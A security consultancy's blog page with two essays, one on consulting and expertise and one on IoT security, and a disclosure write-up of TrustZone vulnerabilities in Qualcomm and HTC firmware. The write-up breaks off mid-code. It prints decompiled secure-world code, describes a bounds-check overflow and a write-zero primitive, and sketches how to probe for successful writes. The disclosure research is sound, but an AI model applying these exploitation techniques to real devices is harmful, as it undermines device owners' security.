Thursday, October 9

What I talk about when I talk about Consulting

Note: this post has very little to do with Atredis as a company. The only relevance being part of a consultancy has to this tirade is that it has positioned me to be invited back to BlueHat for a second year in a row to talk about whatever seems interesting to me at the time.

This post is a textual version of my talk at Microsoft HQ and honestly more of a manifesto. It intends to define another way to explore your company, another way to look at technological expertise and another path to approach security as a fluid entity, or at the very least, track down Godot.

So, years ago I used to work at the Mitre Corporation. For the uninitiated to the realm, Mitre is a Federally-funded Research and Development Center and can be thought of as a pseudo-government think tank for pseudo-applied research constrained to non-profit status. I entered that organization with a solid career background as a developer specializing in crypto implementations, artificial intelligence and applied game theory. I was quickly tasked, at least in the Mitre sense of the word, with "do something cool and expand yourself". In a decidedly rash "because why the hell not" moment, I picked mobile security and human interactions as my paths of exploration. While I'm sure we will meander into security before the end of this diatribe, I'd oddly enough like to start with problems from the other space.

Specifically at Mitre, I looked at how to foster cross-domain innovation. I basically spent a couple years looking at how new ideas blossom when domain experts from disparate verticals interact and share conceptual structures. I spent weeks modeling building layouts and walking paths trying to ascertain how knowledge spread across the campus. I mapped social networks and interaction structures, I explored forced office mate collaborations and I basically geeked hard on graph theory. I wanted to know how small situational changes could force "Dr. Satellite WaveForm Guru" to stop and share a cup of coffee with "Intern Physicist" and for some reason I always expected robots to fall out of the conversation. Awesome laser wielding autonomous robots that would simply self design more robots and blow things up with lasers while rad 80’s metal blared in the background. I guess I had a thing for robots.

I also wanted data, mounds and mounds of data, to fit into beautiful Gephi graphs that could be analyzed and improved upon. I wanted innovation efficiency. Maybe I thought that the end game was me sitting back in some darkened hivemind control room, watching structured magic happen in realtime, I really don't recall. 

I thought that if we could simply control the environment with enough scientific accuracy, we could control that initial "spark" that so many startup books lauded as the beginning of massive scientific breakthroughs. Stated simply, I wanted to play God to a campus of Mensa-level experts. What a surprise, it didn't work, right? Solving the social graph is a slightly harder problem than raw data collection, who knew?

I did walk away with some insight that, while obvious to most people, had eluded me in the depths of my contrivances. A happenstance chat between two people is almost never really an accident, and it takes a catalyst stronger than the occasional espresso to bond two elements from opposing sides of the periodic table.

In my case, the best catalyst was a bonding agent delivered in the form of an inquisitive procrastinator. An outgoing person who would shirk their own responsibilities and deadlines to randomly walk around and ask people "what are you working on". None of the managers could facilitate these meaningful interactions because they had little insight into what other teams were doing outside of their own silos, and were too damn busy “Getting Things Done”. 

A lowly slacker barely hanging onto gainful employment, though, could cross-pollinate like mad. Randomly walking around the building, asking people "what's up, what are you working on?" and then accidentally sharing others' problems during small talk. Someone doing that was pure innovation gold. That person was also a huge burden to the immediate bottom line of the company and easily dismissed as a dead end to a small organization. An unrecognized hero that all too often is left with a pink slip and some much needed "forced vacation". [Shawn says: see also Malcolm Gladwell's "The Tipping Point", on influencers and hubs.]

Let's pause that line of thought for a second and chat about why I sometimes look at Katie Moussouris as the Paul Erdös of Microsoft. If you don't catch it, we will un-pause this conversation when I start talking about degenerates with spray paint.
Mathematician Paul Erdös. Knuth is his homeboy.
Paul Erdös was a brilliant mathematician who solved no small amount of insanely difficult problems, but that's not what he is really known for. He crossed into the general public consciousness for his prolific collaboration across fields; he is more than 15-minute Andy Warhol Famous for the Erdös Number. The Kevin Bacon of Academia, in a sense.

There are books and websites on this construct, so I'll let the one person reading this unfamiliar with the topic explore at their own pace because I don't care about the number either. I want to point out something less evident. 

To some extent, Erdös created a bug bounty in academia. The impetus was vastly different, obviously. I can't speak for Katie or MS, but I don't think either of them wanted to offload problems that would be open and unsolved post personal demise for the simplistic sake of leaving nothing unknown and unexplained. I've never found a definitive source for his original construct, and have always assumed it was an amphetamine-fueled decision process wherein he thought "If I could only be more people, I could solve more problems". A "Fear and Loathing in Las Academia" path to cloning I guess. 

Erdös attacked the problem by offering small rewards to those that solved open problems he didn't have time or the mental faculty to tackle himself. He simply outsourced problem solving before there was a term for it. If inquiring minds want to know more, read "Erdös on Graphs" or anything about Fermat's Last Theorem; both will expound upon the program. The problems were (and the open ones still are) immensely hard.

Take a look at the Collatz Conjecture, for example:
Take any natural number n. If n is even, divide it by 2 to get n/2; if n is odd, multiply it by 3 and add 1 to obtain 3n+1. Repeat the process indefinitely. The conjecture is that no matter what number you start with, you will always eventually reach 1.
Paul Erdős said about the Collatz conjecture: "Mathematics is not yet ready for such problems." He offered $500 USD for its solution.
Simple, huh? As someone who has wasted a considerable amount of time contemplating this one, I welcome you to join the dark side. It is hard and you have loved ones and friends that need you more, but the outcome would be so fascinating, I really don't mind you not having nights or weekends.
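
If you want to poke at it yourself, a minimal C sketch of the iteration looks something like this; it only checks individual starting values, which is exactly why it gets you no closer to the $500:

#include <stdio.h>

/* Count how many Collatz steps it takes a starting value to reach 1.
 * Checking individual values proves nothing about the conjecture itself,
 * and 3n+1 will eventually overflow an unsigned long for large inputs. */
static unsigned long collatz_steps(unsigned long n)
{
    unsigned long steps = 0;

    while (n != 1) {
        n = (n % 2 == 0) ? n / 2 : 3 * n + 1;
        steps++;
    }
    return steps;
}

int main(void)
{
    for (unsigned long n = 2; n <= 27; n++)
        printf("%lu reaches 1 after %lu steps\n", n, collatz_steps(n));
    return 0;
}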

An Erdös check isn't even the type of check you cash, actually. You frame that check and hang it on your office wall when Harvard offers you tenure for being an epic badass. Your prize is writing a page in the book of human knowledge. I might have a slight hero complex here.

Taking a step back though, all Erdös did was to entice random people from random spaces to attack a generic problem. This construct enabled unique points of view to descend upon the same problem space and interact. He seeded the coffee shop with talking points and smart people. He asked a couple of questions and in a sense played God with the outcome. 

History and time actually solve the problems, building upon breakthrough after breakthrough. Fermat's Last Theorem itself was solved with a mix of pure innovation and branches of mathematics that are now foundational but were revolutionary or simply non-existent when Fermat trolled the world, and much later when Erdös offered up a reward for the joke.
Pierre de Fermat, Legendary Troll
Treating exploration as foundational knowledge can be seen most everywhere if you look, but nothing springs to my mind as a better exemplar than graffiti and street art. It is a scene, a lifestyle, legally dubious and, in our conversation, a collection of raw transitory data cataloging human interaction. It all starts with an empty wall, and one after another people come along and tag it, expand upon it, connect the disparate parts and create a living entity of artistic expression. I guess it would be akin to free-form jazz collaboration, but in this instance a city worker washes it away on a scheduled basis and the entire process cycles anew.
London Graffiti
Eyesore or museum quality, in this context we don't care about the transitory expression itself. We care about the process and the components that play the game. Every actor has a part in the whole and each person comes into the collaboration with a specific intent and a specific skill set. Every interaction becomes essential to the overall evolution of the art that exists and each artist's specialty is a core component of the overall construct.

Let me say the same sentence again with slightly different actors: 

Every interaction becomes essential to the overall evolution of the product that ships and each team specialty is a core feature of the overall ecosystem.

If you just woke up from a nice nap with a nightmare about team meetings, I’m sorry and I’ll pause the metaphor break for a bit longer. Consider it a snooze button on the alarm clock of Windows Phone Bluetooth explorations because I want to talk about expertise first.

If I say Kasparov, you probably think about knights and blue mainframes, but let’s drop the mind games and focus on chess for a second. True and utter mastery from our perspective. Not infallible, but an expert by every definition I am aware of. It would be ludicrous to expect anyone in this room to beat a grand master at his or her own game (it could happen, but your ego aside please let me have this statement as fact). Best of 3, 7, 101. As long as we are in the game of chess Kasparov wins. But what if we switch to checkers? Theoretically your odds are better I guess given it is a divergent game, but the outcome is predictable. 

What if we extrapolate this out to “all games” though? I’m going to go out on a limb and bet that at least one person reading this could beat Kasparov at Quidditch and probably half of us would win at Texas Hold ‘Em.
Garry Kasparov, sub-par Quidditch and Poker player
Expertise mixed with human nature tends to silo itself; specific and targeted perfection normally does not mix with well-rounded knowledge. It's the reason people group themselves by similar interests and it is the reason why my two scientists never made laser-wielding robots at Starbucks.

But what if we replace Kasparov with von Neumann, a generally accepted “smart guy” and game theorist at heart. His perfection was not a single game, but the entire construct of a game. Dr. John would not have the skill depth to win against a master, but would understand the implications and theoretical correctness of every move, in every game. Except maybe Quidditch, but probably even that scenario he would see things subtly missed by the lay player. Master in none but “expert” in all? Not really, probably more appropriate to say master in none but meta-understanding in all. He couldn’t beat Kasparov, but he could enumerate where he and Kasparov made mistakes. In a way, he would be qualified to help train and guide a master.
John von Neumann, would build Quidditch state machine
This was a very long-winded way of getting to my point. I want this for you. You are the Kasparov and the Scientist. You have teams that are immensely smart in specific domains and sub-domains and sub-sub-domains, and you probably even have a couple slackers helping ideas spread (please don't fire them, they are your revenue stream in 10 years). What I'm arguing for is a game theory bonding agent, one that can look across silo interactions internal to your products and across all of your competitors.

I want this for you because the real secret is this: they are not your competitors. You don't compete, you innovate and build technology. Other companies do that as well and you share market space with them. Sure, quarterly profit margins make it feel like a race, but the longer term reality is that you are responsible for making things better. That is your real place in the game, you construct the future. If you were simply competing, all your advertisements would look like political ads and read "We don't suck as much as $Product_X".

From a security perspective, internal teams can tell you exactly what is exposed within the confines of their expertise. If those teams are looking at public security theater they can ensure you are not exposing anything documented with a CVE or any vulnerabilities frozen in YouTube presentations. This should be your base minimal expectation.

One last divergence before my parting thoughts:

Please, please, please don't ever expect your people to "think outside of the box". You want experts, and that saying is simply "marketechture" and "thinkfluence" bullshit. No one thinks well "outside of the box" because no one is an expert at something they are not an expert at.

All you get with that request is someone fumbling around and maybe getting lucky. Instead, bring an outsider into the process and expect to get another set of eyes on your problem from someone with a completely different view of the world. Someone with a (potentially lesser) expertise in a (potentially) much larger problem space. An outsider brings new context to the thinking process, “thinking outside of the box” kills morale and wastes smart people on silly things.

Final tirade aside, if you want to know how your different silos interact within a product, you need someone who understands how that technology works. Generally, you want someone who understands all the technology at a less expert / more meta-theory level. Let that person force both expert teams into understanding consequences outside of their vertical.

If you want to know how your technology implementation compares to other companies selling products, look for someone who has an interest in the overall technology space and don’t try to force them into expertise. In AI I used to search for sub-optimal paths: problems with multiple answers wherein the selected solution was the closest to optimization within the computing constraints. Look for sub-optimal expertise, sometimes you don’t need a PhD for progress. You just need a really excited intern. (Unless it's one of those times you need a PhD).

Do you honestly want to know how your product is going to fare in the post ship-date real world? You need to understand every problem in your technology space, all of the problems in your vendors' technology spaces and all of the potential problems from technology that might have conceptually portable attack scenarios.

Trying to secure Bluetooth? I’m sure you have hardened the driver against your hardware, but have you looked at porting all known RFID attacks to your implementation? Do you know what services other vendors expose at the unpaired level of discovery? Have you explored how IoT or RTOS based kernel attacks could be conceptually leveraged against your driver code? If you ever bring in consultants or employees to answer these overall questions and have the realistic intent to use them for anything more than staff augmentation, you should ensure they will do this. You should ensure it excites them and that they want to do it.

Ok, so you really want to know how to leverage the process used by a good consultant?

Stop trying to make everyone an expert at a thing and start trying to make technology better. Period.

We don't look at other companies as your competitors, we look at the meta case of "how do we make technology more secure by having fun and breaking things we admire". You can do the same thing, or you can outsource that to the sub-optimal-experts.

We tend to continually learn a technology by looking at all implementations of it. We tend to start with cross domain similarities and extrapolate from there. We look for the general delta between our knowledge base and your product, and we try to minimize that delta.

Thanks,

m0nk

(and I promised I would mention Godot in this diatribe, so… Godot)


Wednesday, October 8

Let's stop innovating failure

So today I'd like to posit some overall thoughts on the "Internet of Things", specifically pointed at the innovation space and getting products to market. This is quite outside of my company's normal wheelhouse, but I think our hands-on perspective of what hits the streets (and our desks) will be unique enough to pique interest from a broader audience. For those in the security space, I guess I should apologize for the lack of direct exploitation techniques, but this diatribe is really meant for the broader group outside of our walls.

So, you (or your company) have a great idea to change the world and make a huge profit. First of all, congrats and good luck. All you have left to do is write some code, design some hardware and package it all together into an amazing widget. The only problem you face is a temporal one… if you thought of something, chances are others are also thinking about your problem, and hence the race to market begins. 

Speaking of your market, my view is that it functions in one of three distinct ways:
  • You find yourself entering the market as a sole innovating product with no direct competitors
  • You have a unique and special flair for your product, but you are not alone in the space.
  • You are a big name vendor that is entering the space. 

Realistically, the “big name vendor” should not be a separate bullet. Your specific product falls into either of the “novel” or “iterative” spaces listed, but your name and power come with some additional considerations. The new device you are shipping will benefit from your company name and the reputation you have with customers, but if the product fails you will see negative impacts outside of your space. Simply, if your newly enhanced smart TV ships with copious numbers of security flaws, that branding might negatively impact other business units.

For the “iterative” space, you will benefit from the general advertising across your competitive landscape. This effect should be considered cumulative, if not exponential, as the barrage of adverts self validates the product as needed and required from the consumer view. Given you don’t have to sell the overall vision, your advertising tends to focus not on the overall technology but on your special sauce.

For the "novel & new" product designs, you are laden with selling the concept that the market has a hole and consumers simply can't live in a world with such a void. As your product is alone in its space, it sells itself once the consumer is convinced of the overall void.

Now, I mention the advertising space because I believe it embodies a considerable amount of how you as an innovator personally see your product. It is a faint echo of what your priorities are and a telling exhibit of how you are specifically positioned in the market. It also allows me (as a security researcher) to assume what level of security to expect in the product. I do this by extrapolating your security design as a function of "assumed priorities" and "time from design to market"; generally, the faster you race, the weaker I expect your implementations to be. It is logical (although a bit of a cheat), but the metric seems valid from analysis to date.

In general, no company is going to reinvent the wheel. There is no need, it costs too much and is generally a bad idea (hopefully gone are the days of rolling your own crypto). Instead, I predict your product will be based on a fairly standard design:
  • You have some embedded processor running Linux (or if you hate me personally, Windows)
    • If you are constrained or concerned about speed / size / power, you drop linux and ship with an RTOS or code on bare metal instead
  • Following good software engineering principles, your code is modular and uses large swaths of code not written specifically for this project (libc, WiFi and IP stacks, display drivers, etc.)
  • You build your product around a known processor and follow design guidelines from the manufacturer, possibly even basing your design on a template provided by the vendor
  • Knowing mistakes happen, you ship your device with debugging capabilities enabled or easily re-enabled… this helps with RMA problems and figuring out how fielded devices fail

This in essence is efficient design: you offload as much engineering as you can onto previously proven and fielded devices and leave only the hard and specific problems to yourself. You cut costs and gain a robust support architecture. Aside from the last bullet, this mentality is sound. But in reality nothing is free, and these choices have the following consequence:

As a researcher, I am already familiar with your product before you ship it
  • I know the system on chip reference designs and suggested hardware designs
  • I know the operating system particulars
  • I know how to debug your product
  • I am aware of the known issues in your building blocks

In general, this is why I see innovation “Time to Market” as a realistic metric for “Time to Failure”. Your wonderful engineering practices and time saving approaches leave your product prone to exploitation. In a grim reality, your largest saving grace when racing to push things to market is the actual market saturation itself; the case is not “is your device insecure” as much as “has anyone spent the time to look at it instead of a competitor or another device”. I honestly don’t mean to be dismissive here, I respect the hard engineering problems you have overcome. I’m simply stating that I find it rare that a “novel new product” is actually new or unknown to us in the security industry. To borrow from the above example, your new smart TV is identical to the embedded industrial control system I looked at last week.

I promise we are almost past the dour news, but simply stated the following assumptions appear to drive your "idea to design to development to shipping" cycle:
  • Assumption #1: Your special sauce is cutting / bleeding edge and highly innovative. You race these concepts to market before they are secure expecting protection from your building blocks. This is highly understandable from a market perspective, though maybe not the best idea.
  • Assumption #2: You assume your selected platforms and building blocks are secure because they are fielded by others. This is sadly incorrect in a general sense. The vendors in that space are following assumption #1 and you are simply the powerless consumer.
We all want to stand on the shoulders of those that came before us, but we need to take the time to understand the limitations of those principles.

Your product will never be 100% secure, nothing is. That is no excuse to not understand your actual security posture and the inherited posture of your base platforms. It is honestly a hard problem, so I will suggest a mindset that might help:

Aim for a level of security based on the ROI of what you are protecting.

Understand the financial impetus of your market and your potential attackers. Respect your consumer and their needs as much as you respect your own device. This is a simple idea that should be obvious, but I see it disregarded too often to not specifically mention.

It is not that Linux and your other "off the shelf" building blocks cannot be configured to be secure enough for your use case; the real problem is that in your rush to market you assume they already are, and nothing could be further from ground truth.

What you can do:
  • Stop assuming security is someone else’s problem
  • Start considering what potential your product has to be misused
  • Don’t just test your product with a “happy test path” mentality
  • Actively ask your engineers to break your design BEFORE you commit a single line of code or anything to silicon and don't write code until they fail at this task
  • Continue this process until you ship your device
  • Continue this process as you iterate designs on a shipped product
  • Ask for help
  • Consider what side effect implications your product has to your customer environments

I don't mean to shill our services here, but seriously, you should ask for external eyes on your design and your product from someone qualified to help. Don't think that just because we are security consultants or hackers that we are the enemy. Semantics aside, we are honestly here to help. Hire someone to tell you your weak points and take heed of the reports. Consider it an integral part of your marketing budget; I promise it will be considerably cheaper than trying to play publicity cleanup once issues are out in the open.

If you want a product with longevity and a customer base that will continue to buy into your brand and vision, you need to respect them. Take care of them, protect them and don't assume someone else will. The security of your customer is just as much your responsibility as delivering a new device to them is. The decision may delay your time to market by a week or a month, but the end result will be a better product and a better world. 

Thursday, August 14

Here Be Dragons: Vulnerabilities in TrustZone

In June we presented on vulnerabilities in the Qualcomm & HTC implementations of TrustZone at REcon 2014. We have been patiently waiting to drop the research to those interested, and now that Vegas is behind us, we can finally do so.

Why the wait? Well, after REcon, we noted that Dan Rosenberg was presenting on TrustZone research at Black Hat USA, and out of respect for Dan's work, Atredis decided to sit on this blogpost until after his talk. Overlaps and similar research happen all the time, and since BlackHat was fairly close at the time we thought it best to let Dan have the mic. Dan's stuff is great - you should check out his slides and WP; he dropped a good bug with similar impact, and it covers some TZ components not discussed here.

[What is TrustZone?]


The ARM specification of TrustZone Technology has been heavily promoted as the "be all, end all" solution for mobile security. Through extensive marketing promises of easy BYOD, secure PIN entry, and protection against APT (not to mention the ubiquity of ARM chips soldered into mobile devices), TrustZone has become the de facto standard for claiming and providing a "secure processing environment" in cellular handsets.

While a secure processing environment sounds like an awesome thing to have as an end user, the realistic drivers for the massive TrustZone adoption are not owner empowerment but the more mundane use-case of Digital Rights Management (DRM). The secure enclave of TrustZone is primarily used to facilitate vendor locks and DRM processing, rather than increasing the difficulty of compromising user data. Further, due to the TZ architecture, the inclusion of DRM protections provides a net reduction in the real world security provided to the device owner.

Soap box and ramblings aside, Google is your friend if you want more specification data from ARM or if you want high level details from Qualcomm's fortress of shallow marketing materials (trademark pending)... but enough already, let's talk details.

You can watch our REcon presentation here, but unfortunately the first 10-15 minutes was cut off. We're using this blog post to document the vulnerabilities reported to HTC and shed some further light on TrustZone.

[Funny aside: after finding HTC's PGP key on their site and emailing them, they got back to us a month later saying they couldn't open it, and to please send in the clear. We obliged, and they've told us it's fixed, but we are unable to validate until a new firmware revision makes it through a carrier and into the real world.]

[Interfaces]

TZ consumes untrusted input from a number of places:
  • SMC [Secure Monitor Call] interface (has had the most public research)
  • Interrupts
  • Shared Memory
  • Peripherals
We primarily focused on the SMC interface for this round of TZ research. Additionally, we built a fuzzer for TZ that resulted in a metric ton of crashes, but because of architectural reasons, we still think the best route for TZ vuln discovery (on the SMC interface) is via static reversing.

[SMC]

The SMC interface is invoked by utilizing the SMC ARM instruction from supervisor mode, meaning you need to be in the kernel. You invoke the instruction with a pointer to a physical memory location that contains the structures below. Code snippets below are taken from arch/arm/mach-msm/scm.c in an Android kernel.
 42  * An SCM command is laid out in memory as follows:
 43  *
 44  *      ------------------- <--- struct scm_command
 45  *      | command header  |
 46  *      ------------------- 
 47  *      | command buffer  |
 48  *      ------------------- <--- struct scm_response
 49  *      | response header | 
 50  *      -------------------
 51  *      | response buffer |
 52  *      -------------------

The scm_command struct contains its total length, offset to its request buffer, offset to its response buffer header (which in turn contains another offset to its own buffer), and the buffers themselves:
 58 struct scm_command {
 59         u32     len;
 60         u32     buf_offset;
 61         u32     resp_hdr_offset;
 62         u32     id;
 63         u32     buf[0];
 64 };

The resp_hdr_offset entry points to:
 72 struct scm_response {
 73         u32     len;
 74         u32     buf_offset;
 75         u32     is_complete;
 76 };

Lastly, the example kernel driver code that utilizes these buffers:
164 static u32 smc(u32 cmd_addr)
165 {
166         int context_id;
167         register u32 r0 asm("r0") = 1;
168         register u32 r1 asm("r1") = (u32)&context_id;
169         register u32 r2 asm("r2") = cmd_addr;
170         do {
171                 asm volatile(
172                         __asmeq("%0", "r0")
173                         __asmeq("%1", "r0")
174                         __asmeq("%2", "r1")
175                         __asmeq("%3", "r2")
176 #ifdef REQUIRES_SEC
177                         ".arch_extension sec\n"
178 #endif
179                         "smc    #0      @ switch to secure world\n"
180                         : "=r" (r0)
181                         : "r" (r0), "r" (r1), "r" (r2)
182                         : "r3");
183         } while (r0 == SCM_INTERRUPTED);
184 
185         return r0;
186 }

When smc is called, the command buffer will contain a struct made up of the ID of the TZ service being called and an arbitrary number of variables needed for that function.

As one example, scm_set_boot_addr in scm-boot.c invokes SMC like so:
 22 int scm_set_boot_addr(phys_addr_t addr, unsigned int flags)
 23 {
 24         struct {
 25                 unsigned int flags;
 26                 unsigned long addr;
 27         } cmd;
 28 
 29         cmd.addr  = addr;
 30         cmd.flags = flags;
 31         return scm_call(SCM_SVC_BOOT, SCM_BOOT_ADDR,
 32                         &cmd, sizeof(cmd), NULL, 0);
 33 }

[Aside: SCM is not a typo. Qualcomm actually chose SCM, "Secure Channel Manager", as a wrapper for SMC. The scm_call function simply spins up the correct kernel buffers and converts virtual addresses to their phys counterparts.]
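
To make that aside concrete, here is a rough sketch of the buffer scm_call assembles before invoking smc(). This is an approximation, not the actual kernel code: the service/command ID packing is an assumption, and the cache maintenance and response handling are omitted.

/* Approximate sketch of scm_call's buffer construction (not the real code).
 * The real function also flushes caches and polls scm_response.is_complete. */
static int scm_call_sketch(u32 svc_id, u32 cmd_id, const void *req, size_t req_len)
{
        struct scm_command *cmd;
        size_t total = sizeof(*cmd) + req_len + sizeof(struct scm_response);
        int ret;

        cmd = kzalloc(total, GFP_KERNEL);
        if (!cmd)
                return -ENOMEM;

        cmd->len = total;
        cmd->buf_offset = sizeof(*cmd);                   /* request buffer follows the header */
        cmd->resp_hdr_offset = cmd->buf_offset + req_len; /* response header follows the request */
        cmd->id = (svc_id << 10) | cmd_id;                /* assumed service/command ID packing */
        memcpy(cmd->buf, req, req_len);

        ret = smc(virt_to_phys(cmd));                     /* SMC takes the physical address */

        kfree(cmd);
        return ret;
}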

OK, so we know how SMC works, what can we actually talk to?

[TrustZone Services] 

Inside TZ, there is a table labeling all the services, command IDs, location of the function implementing a given service, return types, and the number and size of arguments. It looks like this:
ROM:2A02E054                 DCD 0x801               ; Service ID
ROM:2A02E058                 DCD aTzbsp_pil_init     ; "tzbsp_pil_init_image_ns"
ROM:2A02E05C                 DCD 0x1D                ; Return type
ROM:2A02E060                 DCD tzbsp_pil_init_image_ns+1
ROM:2A02E064                 DCD 2                   ; Number of arguments
ROM:2A02E068                 DCD 4                   ; Size of arg1
ROM:2A02E06C                 DCD 4                   ; Size of arg2
ROM:2A02E070                 DCD 0x805
ROM:2A02E074                 DCD aTzbsp_pil_auth     ; "tzbsp_pil_auth_reset_ns"
ROM:2A02E078                 DCD 0x1D
ROM:2A02E07C                 DCD tzbsp_pil_auth_reset_ns+1
ROM:2A02E080                 DCD 1
ROM:2A02E084                 DCD 4
...

... And so on.

From here, we can enumerate all available services, know what to expect them to return, as well as know how many arguments to send and what size they are.

[Pointer: this table is really useful for figuring out the base of the firmware image when you extract it from a device or a firmware file. The string pointer for service 0x801 should always point to "tzbsp_pil_init_image_ns", giving you the offset values you need to calculate its base.]
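
If you want to script that calculation, a quick-and-dirty scanner along the following lines works. It bakes in a few assumptions: little-endian 32-bit words, a flat load where virtual address = base + file offset, a page-aligned base, and GNU memmem.

#define _GNU_SOURCE
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char **argv)
{
    const char *marker = "tzbsp_pil_init_image_ns";
    FILE *f;
    long size, i;
    uint8_t *buf, *hit;
    uint32_t str_off;

    if (argc != 2 || !(f = fopen(argv[1], "rb")))
        return 1;
    fseek(f, 0, SEEK_END);
    size = ftell(f);
    rewind(f);
    buf = malloc(size);
    if (fread(buf, 1, size, f) != (size_t)size)
        return 1;
    fclose(f);

    /* File offset of the marker string referenced by service 0x801. */
    hit = memmem(buf, size, marker, strlen(marker) + 1);
    if (!hit)
        return 1;
    str_off = (uint32_t)(hit - buf);

    /* Find the service table entry: the 0x801 ID followed by the string
     * pointer.  base = pointer value - file offset of the string. */
    for (i = 0; i + 8 <= size; i += 4) {
        uint32_t id  = *(uint32_t *)(buf + i);
        uint32_t ptr = *(uint32_t *)(buf + i + 4);
        if (id == 0x801 && ptr > str_off && ((ptr - str_off) & 0xfff) == 0)
            printf("candidate base 0x%08x (table entry at file offset 0x%lx)\n",
                   ptr - str_off, (unsigned long)i);
    }
    return 0;
}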

Looking at the full listing, most are part of the Qualcomm core functionality available on all supported devices, but OEMs have the option of extending it with their own services. HTC extended theirs considerably, so let's focus on them:
tzbsp_oem_do_something
tzbsp_oem_enc
tzbsp_oem_get_rand
tzbsp_oem_log_operator
tzbsp_oem_hash
tzbsp_oem_set_simlock_retry
tzbsp_oem_get_security_level
tzbsp_oem_verify_bootloader
tzbsp_oem_aes
tzbsp_oem_set_simlock
tzbsp_oem_update_simlock
tzbsp_oem_simlock_magic
tzbsp_oem_read_mem
tzbsp_oem_set_ddr_mpu
tzbsp_oem_update_smem
tzbsp_oem_emmc_write_prot
tzbsp_oem_write_mem
tzbsp_oem_set_gpio_owner
tzbsp_oem_read_simlock
tzbsp_oem_access_item
tzbsp_oem_disable_svc
tzbsp_oem_read_simlock_mask
tzbsp_oem_memcpy
tzbsp_oem_3rd_party_syscall
tzbsp_oem_query_key
tzbsp_oem_simlock_unlock
tzbsp_oem_memprot
tzbsp_oem_key_ladder

Look at those primitives! _write_mem, _read_mem, _memcpy?!

Ah, so here's where we learn a new valuable lesson about TZ service security: Everyone does their own thing. To summarize it:
  • Each function individually validates input on invocation.
  • HTC utilizes an access bitmask representing each of their tzbsp_oem functions, with a check at the top of every function determining if the service is disabled or not. (See [is_service_enabled] below. This is how HTC disables those fantastical exploit primitives listed above.)
  • Qualcomm does not universally block access to any of their functions. If they're present, it's assumed they're needed, and while input is validated, the function itself is accessible to the kernel.
  • Qualcomm's input validation uses a check against several protected memory regions, bailing out if you touch any of them.
  • Some OEMs perform their own validation of input against their specific address ranges, rather than using QC's list. Their addresses are, umm, less complete.
  • Some platforms copy QC's model, performing the same validation. 
One thing I'll point out about this model is that each function has to do it correctly, itself. Guess how consistent it is across all of the given players?

[Randomness: You may notice the tzbsp_oem_do_something function. We've seen that function in numerous vendor implementations, and we can only suspect it is sample code that QC provides to OEMs who just leave it in their production code. If you are curious what that function does, however, you will usually find it merely returns 0. Yes, the aptly named tzbsp_oem_do_something inevitably does nothing.]

[Enter HTC]

One short piece of information before we dive into the bugs.

[is_service_enabled]

This is the bitmask I was referencing above that HTC added to their OEM functions. The bitmask starts off as 0xFFFFFFFF in flash, and during boot, dangerous functions are turned off once they are not needed. This is perhaps a fragile model, but it does allow the temporary usage of TZ services that can later be disabled after they are no longer needed.
signed int __fastcall is_svc_enabled(unsigned __int8 svc_id)
{
  return g_disable_bitmask & (1 << svc_id);
}

[Note: TZ does quite a bit of validation, to varying degrees of success, on addresses passed in to ensure writes to secure memory don't occur. Because of this, if you pass in the address of a kernel variable to detect a write vulnerability, it won't tell you anything, because it is not a secure address. So how can you detect write vulnerabilities without reversing them? Well, you can pass in the address of g_disable_bitmask and then try to invoke all OEM functions as a poor man's read primitive. If your write succeeded, you will see that different functions are now enabled/disabled.]
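
A rough sketch of that probe is below, using the same call_svc wrapper that shows up in the exploit code later in this post. The OEM service ID encoding here is a guess on my part, so treat the whole thing as illustrative.

/* Sketch: after aiming a suspected write at g_disable_bitmask, poke each HTC
 * OEM service with dummy arguments and note which ones now claim to be
 * disabled (-4).  If the enabled/disabled pattern changes, the write landed. */
#define TZ_HTC_OEM_SVC_BASE 0x3f800   /* assumed base for the OEM service IDs */

static void probe_oem_services(void)
{
        int id, ret;

        for (id = 0; id < 32; id++) {
                ret = call_svc(TZ_HTC_OEM_SVC_BASE + id, 1, 0);
                printk("oem svc 0x%x -> %d (%s)\n", TZ_HTC_OEM_SVC_BASE + id,
                       ret, ret == -4 ? "disabled" : "enabled or errored");
        }
}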

[tzbsp_oem_access_item, address validation]

#define IS_TZ_MEMORY(x) (x >= 0x2A000000 && x < 0x2B000000)

int tzbsp_oem_access_item(int write_flag, int item_id, void * addr, int len) {
  if (!is_svc_enabled(26)) {
    return -4;
  }

  if ((IS_TZ_MEMORY(addr) || IS_TZ_MEMORY(addr + len - 1)) && addr < 0x2A03F000) {
    return -1;
  }

  if (!write_flag) {
    ...
    if (item_id == 37) {
      if (g_flag > 0) {
        memcpy(addr, g_item_37, len);
      }
    }
    ...
  }
}

HTC uses similar bounds checking in a few places. This check tries to verify if the start and stop addresses are in between 0x2A000000 and 0x2A03F000. There are multiple problems with this:
  • It's only checking against one range, where QC's code checks against 12.
  • What happens if the length value is really big? (Answer: it overflows and wraps around under 0x2A03F000, bypassing this check, but it's ugly and influences a lot more than is ideal.)
  • This address range is supposed to be the TZ code and data itself, but someone forgot to update the ceiling, because the TZ code extends past 0x2A03F000 due to large amounts of DRM code.
In any event, that one is a pain to exploit, and there are others, so let's move on.

[tzbsp_oem_discretix, memory write]

int __tzbsp_oem_discretix(struct_p * s, size_t len) {
  if (len != 0x14) {
    return -16;
  }
  s->status = g_fs_status; // *(int *)(s + 16) = g_fs_status
  ...
}

Hey, not everyone validates their input! And check that out, an overwrite of s->status (s + 16) with whatever is stored at 0x2A02BC80 (g_fs_status).

We later determined this value was zero in every case we cared about, so we can call it a write zero primitive. Under the hood, it is using the ARM STR instruction, so it has to be 4-byte aligned, but is otherwise very flexible.

[tzbsp_oem_memcpy, why do you exist?]

#define IS_TZ_MEMORY(x) (x >= 0x2A000000 && x < 0x2B000000)
#define CONTAINS_TZ_MEMORY(x, len) (x < 0x2A000000 && (x + len) >= 0x2B000000)

signed int tzbsp_oem_memcpy(void * dst, void * src, uint32_t len)
{
  uintptr_t dst_end   = dst + len - 1;
  uint32_t copying_to_tz   = CONTAINS_TZ_MEMORY(dst, len) || IS_TZ_MEMORY(dst);
  uint32_t copying_from_tz = CONTAINS_TZ_MEMORY(src, len) || IS_TZ_MEMORY(src);

  if ( !is_service_enabled(20) )
    return -4;
  
  if (copying_to_tz && copying_from_tz) {
    return -1;
  }
  if (copying_to_tz && dst < 0x2A03F000) {
    return -1;
  }

  if ( dword_2A02BAC8 > 1u ) {
    if (dst < 0x88AF0000 && dst_end >= 0x88AF1140) {
      return -16;
    }
    if ((dst_end + 0x77510000) < 0x1140 || (dst + 0x77510000) < 0x1140) {
      return -16;
    }
    if (src != 0x88AF0000) {
      return -2;
    }
